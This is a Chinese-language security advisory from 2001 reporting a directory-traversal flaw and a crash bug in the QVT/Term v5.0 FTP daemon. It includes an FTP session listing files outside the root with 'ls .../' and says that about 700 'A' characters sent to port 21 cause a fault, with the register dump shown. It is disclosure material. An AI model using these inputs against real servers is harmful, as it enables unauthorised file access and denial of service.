发布日期：2001-09-25
更新日期：2001-09-28

受影响系统：

QVT/Term v5.0

描述：

---

QVT/Term v5.0是由“http://www.qpc.com/”发布的Internet工具包，发现其中FTP守
护程序存在两个安全漏洞，可能导致远程用户列出ftp根目录之外的文件和使其崩溃。

假设ftp根目录为“C:\root\root\”，下面演示了如何列出ftp根目录之外的文件：

> ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 xxxxxxxxx FTP server (QVT/Net 4.3) ready.
User (xxxxxxxxx.rh.rit.edu:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> ls ../
200 PORT command successful.
150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes).
root
226 Transfer complete.
ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec.
ftp> ls .../
     [file listing of C:\ is shown here]
226 Transfer complete.
ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec.
ftp>

如果远程用户连接到端口21并发送大约700个字符“A”时，FTPD可能导致一个无效页面
错误：

module FTPD.EXE at 017f:00404b34.
Registers:
EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213
EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58
ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7
EDX=006699a5 ES=0187 EDI=00669ffd GS=0000
Bytes at CS:EIP:
f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b
Stack dump:
00000004 00771b90 00666a58 0064fbc0
0000060a 12948ae8 00771b90 004105a0
00288b30 bff728a2 0187bff7 bff713e2
12948b04 0a2c175f 12990002 00288b4c

<*来源：（joetesta@hushmail.com）
  参考：http://archives.neohapsis.com/archives/bugtraq/2001-09/0216.html
*>

建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.qpc.com/

浏览次数：4039
严重程度：0（网友投票）